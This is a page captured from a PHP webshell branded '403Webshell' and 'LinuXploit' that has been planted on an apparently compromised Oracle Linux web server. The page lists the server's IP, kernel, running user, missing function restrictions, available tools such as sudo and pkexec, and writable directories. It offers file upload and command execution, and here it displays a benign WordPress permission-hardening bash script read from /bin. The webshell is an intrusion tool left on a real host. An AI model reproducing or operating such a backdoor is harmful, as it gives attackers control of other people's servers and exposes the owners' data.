403Webshell
Server IP : 152.69.216.235  /  Your IP : 80.80.80.28
Web Server : Apache/2.4.37 (Oracle Linux Server)
System : Linux ust-wp4-prod 5.15.0-310.184.5.2.el8uek.x86_64 #2 SMP Wed Jul 9 16:08:33 PDT 2025 x86_64
User : apache ( 48)
PHP Version : 8.4.10
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /bin/harden_wordpress.sh
#!/bin/bash

echo "====================================="
echo " WordPress Hardening Script"
echo "====================================="

# --- Prompt for values ---
read -rp "Enter WordPress install path [/var/www/html/wordpress]: " WP_PATH
WP_PATH=${WP_PATH:-/var/www/html/wordpress}

read -rp "Enter FTP/SSH user that owns WordPress files [wwwFtp]: " FTP_USER
FTP_USER=${FTP_USER:-wwwFtp}

read -rp "Enter site group name to share between users [wpgroup]: " SITE_GROUP
SITE_GROUP=${SITE_GROUP:-wpgroup}

echo ""
echo "⚙️  Using configuration:"
echo "   WordPress path : $WP_PATH"
echo "   FTP user       : $FTP_USER"
echo "   Shared group   : $SITE_GROUP"
echo ""

# --- Choose mode ---
echo "Choose mode:"
echo "  1) Harden (secure core, safe uploads, updatable plugins/themes)"
echo "  2) Revert (reset to 755/644 everywhere)"
read -rp "Select [1/2]: " MODE

if [[ "$MODE" == "1" ]]; then
    echo "🔒 Applying HARDENING mode..."

    # --- Set ownership ---
    chown -R $FTP_USER:$SITE_GROUP "$WP_PATH"

    # --- Core WordPress files (read-only for Apache) ---
    echo "🔧 Securing core WordPress files..."
    find "$WP_PATH" -type d -not -path "$WP_PATH/wp-content*" -exec chmod 750 {} \;
    find "$WP_PATH" -type f -not -path "$WP_PATH/wp-content*" -exec chmod 640 {} \;

    # --- Uploads (writable) ---
    echo "🔧 Securing uploads directory..."
    chown -R $FTP_USER:$SITE_GROUP "$WP_PATH/wp-content/uploads"
    find "$WP_PATH/wp-content/uploads" -type d -exec chmod 770 {} \;
    find "$WP_PATH/wp-content/uploads" -type f -exec chmod 660 {} \;

    # --- Plugins & Themes (writable for updates) ---
    echo "🔧 Configuring plugins & themes directories..."
    chown -R $FTP_USER:$SITE_GROUP "$WP_PATH/wp-content/plugins"
    chown -R $FTP_USER:$SITE_GROUP "$WP_PATH/wp-content/themes"
    find "$WP_PATH/wp-content/plugins" -type d -exec chmod 775 {} \;
    find "$WP_PATH/wp-content/plugins" -type f -exec chmod 664 {} \;
    find "$WP_PATH/wp-content/themes" -type d -exec chmod 775 {} \;
    find "$WP_PATH/wp-content/themes" -type f -exec chmod 664 {} \;

    # --- Secure wp-config.php ---
    echo "🔧 Securing wp-config.php..."
    chmod 600 "$WP_PATH/wp-config.php"

    echo ""
    echo "✅ Hardening applied successfully!"

elif [[ "$MODE" == "2" ]]; then
    echo "♻️  Reverting to classic 755/644..."

    # --- Reset ownership ---
    chown -R $FTP_USER:$SITE_GROUP "$WP_PATH"

    # --- Reset permissions ---
    find "$WP_PATH" -type d -exec chmod 755 {} \;
    find "$WP_PATH" -type f -exec chmod 644 {} \;

    # --- Reset wp-config.php to readable ---
    chmod 640 "$WP_PATH/wp-config.php"

    echo ""
    echo "✅ Revert completed successfully!"

else
    echo "❌ Invalid selection. Aborted."
    exit 1
fi

Youez - 2016 - github.com/yon3zu
LinuXploit